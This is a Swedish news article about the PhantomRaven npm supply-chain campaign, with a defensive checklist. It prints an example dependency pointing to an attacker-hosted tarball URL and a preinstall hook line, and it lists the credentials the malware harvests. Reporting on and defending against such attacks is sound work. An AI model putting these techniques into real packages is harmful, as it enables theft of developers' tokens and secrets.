Cybertech Europe 2026-IT Branschen Official Media Partner
Prenumerera

Håll dig uppdaterad med de viktigaste nyheterna

Genom att trycka på knappen Prenumerera bekräftar du att du har läst och godkänner vår integritetspolicy och användarvillkor
Kontakta oss

PhantomRaven npm supply chain attack – 126 skadliga npm-paket och dolda beroenden

PhantomRaven npm supply chain attack – 126 skadliga npm-paket och dolda beroenden PhantomRaven npm supply chain attack – 126 skadliga npm-paket och dolda beroenden
PhantomRaven-kampanjen utnyttjar dolda npm-beroenden för att sprida skadlig kod.

Den pågående PhantomRaven npm supply chain attack är en sofistikerad kampanj mot skadlig kod riktad mot utvecklare världen över. Sedan augusti 2025 har attacken distribuerat 126 skadliga npm-paket som tillsammans har laddats ner mer än 86 000 gånger. Syftet är att stjäla npm-autentiseringstokens, GitHub-inloggningsuppgifter och CI/CD-hemligheter, samtidigt som avancerade detektionsundvikande tekniker används för att kringgå de flesta säkerhetsverktyg.

Analytiker på Koi Security identifierade kampanjen i oktober 2025 när deras beteendeövervakningssystem, Wings, flaggade misstänkt nätverksaktivitet under paketinstallationer. Alla skadliga paket gjorde externa förfrågningar till samma domän, vilket avslöjade en samordnad och global operation.

PhantomRaven npm supply chain attack – 126 skadliga npm-paket och dolda beroenden | IT-Branschen

Hur PhantomRaven npm supply chain attack fungerar

Undersökningen av Koi-forskare avslöjade en tydlig tidslinje. De första 21 paketen upptäcktes och togs bort i augusti 2025. Kort därefter anpassade angriparna sin strategi och lyckades publicera ytterligare 80 paket mellan september och oktober som helt undvek vanliga detekteringsmekanismer. Angriparens infrastruktur visar en kontrast mellan tekniskt avancerat utförande och förvånansvärt slarvig driftssäkerhet.

  • IT-Branschen Nordic technology media platform covering cybersecurity, cloud, AI, digital transformation, channel, MSP and enterprise IT news
    IT-Branschen is a leading Nordic technology media platform covering cybersecurity news, artificial intelligence, cloud computing, enterprise IT, digital transformation, managed services, channel partners, software development, telecommunications, data centers, IT infrastructure, technology leadership, business innovation, and emerging technologies. Through executive interviews, industry analysis, event coverage, thought leadership, product launches, vendor updates, and market insights, IT-Branschen connects technology decision-makers, CIOs, CISOs, CTOs, IT managers, MSPs, resellers, distributors, technology vendors, startups, and enterprise organizations across Sweden, Norway, Denmark, Finland, and Europe. Coverage includes cybersecurity trends, AI adoption, cloud strategy, enterprise software, networking, digital infrastructure, sustainability, compliance, governance, risk management, automation, data analytics, and future technology developments.
    EGET INNEHÅLL

  • VORTIQ-X AI Governance hjälper företag att omvandla AI till styrbart och verifierbart affärsvärde.
    VORTIQ-X är en AI Governance-plattform som hjälper organisationer att styra, verifiera och skapa mätbart affärsvärde från AI. Plattformen fokuserar på transparens, regelefterlevnad, AI-styrning och effektiv användning av AI i verksamhetskritiska processer.
    ANNONS

  • Cybertech Europe 2026 cybersecurity conference in Rome with IT-Branschen as Official Media Partner
    Cybertech Europe 2026 is one of Europe's leading cybersecurity conferences, bringing together cybersecurity leaders, government officials, technology innovators, startups, investors, and enterprise decision-makers in Rome. IT-Branschen serves as an Official Media Partner, providing event coverage, executive interviews, industry insights, and cybersecurity news for Nordic and European audiences.
    ANNONS

  • Maciek Szczesniak featured on IT-Branschen Wire Channel Magic Chats podcast banner
    Maciek Szczesniak appears on IT-Branschen Wire Channel Magic Chats, discussing leadership, innovation, digital transformation, and business services.
    SPONSRAD

För att dölja den skadliga koden använde angriparna en teknik med fjärrdynamiska beroenden. Den gör det möjligt att definiera beroenden via HTTP-URL:er istället för via npm-registret, till exempel:
“ui-styles-pkg”: “http://packages.storeartifact.com/ui-styles-pkg.tgz”.
När ett sådant paket installeras hämtar npm automatiskt det externa beroendet utan någon säkerhetsvalidering eller insyn.

Detta innebär att koden som laddas upp till npmjs.com kan se helt ofarlig ut – ofta bara ett “hello world”-skript – medan den verkliga skadliga nyttolasten hämtas dynamiskt från angriparens server vid installation. På så sätt kringgår PhantomRaven-angriparna både statisk kodanalys och beroendeskanning.

Dolda beroenden och automatisk körning

När det osynliga beroendet anländer till offrets system aktiveras den skadliga koden omedelbart genom npm:s livscykelskript. Den manipulerade package.json-filen innehåller ett förinstallationsskript, “preinstall”: “node index.js”, som körs automatiskt utan användarens vetskap. Det spelar ingen roll hur djupt i beroendeträdet paketet ligger – varje installation av ett till synes legitimt paket kan utlösa den skadliga körningen.

Den PhantomRaven npm supply chain attack utnyttjar alltså npm:s egen flexibilitet för att leverera skadlig kod i realtid. Eftersom varje installation hämtar beroendet på nytt från angriparens server kan nyttolasten dessutom anpassas efter målmiljön, vilket gör attacken mycket svår att upptäcka och stoppa.

Vad angriparna samlar in

Efter en lyckad installation samlar PhantomRaven systematiskt in e-postadresser från miljövariabler, gitconfig-filer, npmrc-konfigurationer och författarfält i package.json. Den exfiltrerar även CI/CD-autentiseringsuppgifter, däribland GitHub Actions-tokens, GitLab CI-nycklar, Jenkins-inloggningar, CircleCI-tokens och npm-publiceringstokens.

Skadlig programvara gör därefter en fullständig systemprofilering: offentliga IP-adresser, värdnamn, operativsystem, Node.js-versioner och nätverkskonfigurationer samlas in för att skilja mellan företagsnätverk och enskilda utvecklarmaskiner. Den informationen används för att identifiera värdefulla mål där angriparna kan vinna större åtkomst eller spridning.

Operativt slarv och spårning

Trots den tekniska skickligheten visar infrastrukturen tecken på operativt slarv. Flera e-postkonton skapades sekventiellt via gratistjänster – från [email protected] till [email protected] – och användarnamn som npmhell och npmpackagejpd återkommer i flera paket. Denna inkonsekvens har gjort det möjligt för forskare att spåra kampanjen till en enskild aktör, vilket ger hopp om framtida identifiering och åtal.

PhantomRaven npm supply chain attack – 126 skadliga npm-paket och dolda beroenden | IT-Branschen

Rekommenderade skyddsåtgärder

  1. Rotera alla tokens och API-nycklar (GitHub, npm, CI/CD) som kan ha exponerats.
  2. Granska package.json-filer och identifiera alla beroenden som refererar till HTTP-URL:er. Blockera eller ta bort dem.
  3. Implementera SBOM-verktyg som CycloneDX eller SPDX för att få full insyn i beroenden och versionshistorik.
  4. Begränsa token-behörigheter, använd kortlivade hemligheter och aktivera automatisk rotation.
  5. Inför beteendebaserad övervakning i CI/CD-miljöer, exempelvis sandbox-analys av nya paket innan de distribueras.
  6. Följ OWASP Software Component Verification Standard för säker hantering av tredjepartsberoenden.
  7. Överväg att använda privata npm-register och validering av beroenden innan publicering för att minska risken för manipulation i öppna ekosystem.
PhantomRaven npm supply chain attack – 126 skadliga npm-paket och dolda beroenden | IT-Branschen

Analys och betydelse för branschen

Den växande omfattningen av attacker som PhantomRaven npm supply chain attack visar tydligt hur beroendekedjan har blivit en av mjukvarans största sårbarheter. I takt med att företag bygger på öppen källkod och tusentals tredjepartspaket ökar risken att en enda komprometterad komponent får enorma konsekvenser.

För organisationer inom IT-branschen innebär detta att säkerhet inte längre bara handlar om nätverk eller slutanvändare – utan om hela utvecklingskedjan. Säker kodhantering, tillförlitliga beroenden och kontinuerlig analys av leverantörskedjan blir en strategisk fråga snarare än en teknisk detalj.

Kampanjen visar också att angripare har börjat tänka som utvecklare: de utnyttjar befintliga funktioner i verktyg som npm för att sprida skadlig kod på ett sätt som ser helt legitimt ut. Detta kräver en förändring i hur företag övervakar och verifierar sin programvara.

För svenska och nordiska företag understryker händelsen vikten av att bygga upp kompetens inom software supply chain security och att följa internationella standarder. Genom proaktiv kontroll, delad information och öppna samarbeten kan branschen stå bättre rustad inför nästa stora angrepp.

Håll dig uppdaterad med de viktigaste nyheterna

Genom att trycka på knappen Prenumerera bekräftar du att du har läst och godkänner vår integritetspolicy och användarvillkor
  • VORTIQ-X AI Governance hjälper företag att omvandla AI till styrbart och verifierbart affärsvärde.
    VORTIQ-X är en AI Governance-plattform som hjälper organisationer att styra, verifiera och skapa mätbart affärsvärde från AI. Plattformen fokuserar på transparens, regelefterlevnad, AI-styrning och effektiv användning av AI i verksamhetskritiska processer.
    ANNONS

  • Cybertech Europe 2026 cybersecurity conference in Rome with IT-Branschen as Official Media Partner
    Cybertech Europe 2026 is one of Europe's leading cybersecurity conferences, bringing together cybersecurity leaders, government officials, technology innovators, startups, investors, and enterprise decision-makers in Rome. IT-Branschen serves as an Official Media Partner, providing event coverage, executive interviews, industry insights, and cybersecurity news for Nordic and European audiences.
    ANNONS

  • Maciek Szczesniak featured on IT-Branschen Wire Channel Magic Chats podcast banner
    Maciek Szczesniak appears on IT-Branschen Wire Channel Magic Chats, discussing leadership, innovation, digital transformation, and business services.
    SPONSRAD

  • IT-Branschen Nordic technology media platform covering cybersecurity, cloud, AI, digital transformation, channel, MSP and enterprise IT news
    IT-Branschen is a leading Nordic technology media platform covering cybersecurity news, artificial intelligence, cloud computing, enterprise IT, digital transformation, managed services, channel partners, software development, telecommunications, data centers, IT infrastructure, technology leadership, business innovation, and emerging technologies. Through executive interviews, industry analysis, event coverage, thought leadership, product launches, vendor updates, and market insights, IT-Branschen connects technology decision-makers, CIOs, CISOs, CTOs, IT managers, MSPs, resellers, distributors, technology vendors, startups, and enterprise organizations across Sweden, Norway, Denmark, Finland, and Europe. Coverage includes cybersecurity trends, AI adoption, cloud strategy, enterprise software, networking, digital infrastructure, sustainability, compliance, governance, risk management, automation, data analytics, and future technology developments.
    EGET INNEHÅLL